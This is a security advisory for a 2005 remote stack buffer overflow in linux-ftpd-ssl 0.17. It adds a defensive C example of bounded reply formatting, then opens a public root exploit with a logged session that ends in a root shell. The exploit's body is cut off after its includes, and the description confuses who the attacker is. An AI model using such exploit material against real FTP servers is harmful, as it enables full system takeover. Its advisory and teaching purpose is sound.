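Linux-FTPD-SSL FTP Server Remote Buffer Overflow Vulnerability
Published: 2005-11-15
Updated: 2005-11-15
Affected systems:
Gentoo Linux
Christoph Martin linux-ftpd-ssl 0.17
Description:
BUGTRAQ ID: 15343
linux-ftpd-ssl is an FTP server with encryption support.
The linux-ftpd-ssl package contains a remote overflow vulnerability; a malicious server could exploit it to execute arbitrary commands on the host.
An overlong response command generated by a malicious server can overwrite a stack buffer. An attacker who is able to create directories that are accessible via FTP can exploit this vulnerability to execute arbitrary code on the local machine with root privileges.
<*Source: kcope (kingcope@gmx.net)
Link: http://www.gentoo.org/security/en/glsa/glsa-200511-11.xml
*>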
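The description above concerns a reply that grows past a fixed-size stack buffer when it carries text such as a long directory name. The C code below is an added example of length-checked reply formatting; it is not code from linux-ftpd-ssl or from the original advisory, and `format_reply`, `REPLY_MAX` and the 451 fallback reply are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 256   /* assumed size of the server's fixed reply buffer */

/* Format one FTP reply line "NNN text\r\n" into out[cap].
 * Returns the line length, or -1 if the text would not fit; a short fixed
 * 451 reply is then stored instead, so client-influenced text such as a long
 * directory name never runs past the end of the buffer. A cap under 64
 * bytes is rejected with -1 and out is left untouched. */
int format_reply(char *out, size_t cap, int code, const char *fmt, ...)
{
    va_list ap;
    int head, body;

    if (cap < 64)                       /* room for code prefix and fallback */
        return -1;
    head = snprintf(out, cap, "%d ", code);
    va_start(ap, fmt);
    body = vsnprintf(out + head, cap - (size_t)head, fmt, ap);  /* bounded */
    va_end(ap);

    /* vsnprintf returns the length it needed; "\r\n" and NUL must fit too */
    if (body < 0 || (size_t)head + (size_t)body + 3 > cap) {
        snprintf(out, cap, "451 Reply too long.\r\n");
        return -1;
    }
    memcpy(out + head + body, "\r\n", 3);
    return head + body + 2;
}

int main(void)
{
    char reply[REPLY_MAX], longdir[1024];   /* constructed sample input */

    memset(longdir, 'A', sizeof longdir - 1);
    longdir[sizeof longdir - 1] = '\0';

    format_reply(reply, sizeof reply, 257, "\"%s\" directory created.", "pub");
    fputs(reply, stdout);
    format_reply(reply, sizeof reply, 257, "\"%s\" directory created.", longdir);
    fputs(reply, stdout);               /* the fixed 451 line, not a cut-off name */
    return 0;
}
```

The same check applies to every code path that builds a reply from a file or directory name, not only to directory creation.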
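Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!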
/**********************************************************/
/** lnxFTPDssl_warez.c **/
/** linux-ftpd-ssl 0.17 remote r00t exploit by kcope **/
/** for all of those who installed the ssl ready version **/
/** of linux-ftpd to be more "secure" **/
/** **/
/** be aware of the buffer overflows, **/
/** the code is strong cryto **/
/**********************************************************/
/** thanx blackzero,revoguard,wY!,net_spy **/
/** Confidential. Keep Private! **/
/**********************************************************/
/**
C:\Dokumente und Einstellungen\Administrator\Desktop>telnet 192.168.2.9 21
220 localhost.localdomain FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready.
AUTH SSL
234 AUTH SSL OK.
;PpPpPPpPPPpPPPPpPppPPPPPpPpPPPpPPpPpPPpPPPpPPPPpPppPPPPPpPpPPPpP
C:\Dokumente und Einstellungen\Administrator\Desktop>lnxFTPDssl_warez.exe 192.168.2.9 kcope password
lnxFTPDssl_warez.c
linux-ftpd-ssl 0.17 remote r00t exploit by kcope
connecting to 192.168.2.9:21... ok.
OK - STARTING ATTACK
USING STACK ADDRESS 0xbfffcc03
USING STACK ADDRESS 0xbfffcc13
USING STACK ADDRESS 0xbfffcc23
USING STACK ADDRESS 0xbfffcc33
USING STACK ADDRESS 0xbfffcc43
USING STACK ADDRESS 0xbfffcc53
USING STACK ADDRESS 0xbfffcc63
USING STACK ADDRESS 0xbfffcc73
USING STACK ADDRESS 0xbfffcc83
USING STACK ADDRESS 0xbfffcc93
USING STACK ADDRESS 0xbfffcca3
USING STACK ADDRESS 0xbfffccb3
USING STACK ADDRESS 0xbfffccc3
USING STACK ADDRESS 0xbfffccd3
USING STACK ADDRESS 0xbfffcce3
USING STACK ADDRESS 0xbfffccf3
USING STACK ADDRESS 0xbfffcd03
USING STACK ADDRESS 0xbfffcd13
USING STACK ADDRESS 0xbfffcd23
USING STACK ADDRESS 0xbfffcd33
USING STACK ADDRESS 0xbfffcd43
USING STACK ADDRESS 0xbfffcd53
USING STACK ADDRESS 0xbfffcd63
USING STACK ADDRESS 0xbfffcd73
USING STACK ADDRESS 0xbfffcd83
USING STACK ADDRESS 0xbfffcd93
USING STACK ADDRESS 0xbfffcda3
USING STACK ADDRESS 0xbfffcdb3
USING STACK ADDRESS 0xbfffcdc3
USING STACK ADDRESS 0xbfffcdd3
USING STACK ADDRESS 0xbfffcde3
USING STACK ADDRESS 0xbfffcdf3
USING STACK ADDRESS 0xbfffce03
USING STACK ADDRESS 0xbfffce13
USING STACK ADDRESS 0xbfffce23
USING STACK ADDRESS 0xbfffce33
USING STACK ADDRESS 0xbfffce43
USING STACK ADDRESS 0xbfffce53
USING STACK ADDRESS 0xbfffce63
USING STACK ADDRESS 0xbfffce73
USING STACK ADDRESS 0xbfffce83
USING STACK ADDRESS 0xbfffce93
USING STACK ADDRESS 0xbfffcea3
USING STACK ADDRESS 0xbfffceb3
USING STACK ADDRESS 0xbfffcec3
Let's get ready to rumble!
id
uid=0(root) gid=0(root) egid=1000(kcope) groups=1000(kcope),20(dialout),24(cdrom
),25(floppy),29(audio),44(video),46(plugdev)
uname -a
Linux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
**/
// Tested on Linux 2.4.18-14 Redhat 8.0
// Linux 2.2.20-idepci Debian GNU 3.0
// Linux 2.4.27-2-386 Debian GNU 3.1
// CHECK VER3 FOR MORE SUPPORT!!!
// ***KEEP IT ULTRA PRIV8***
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>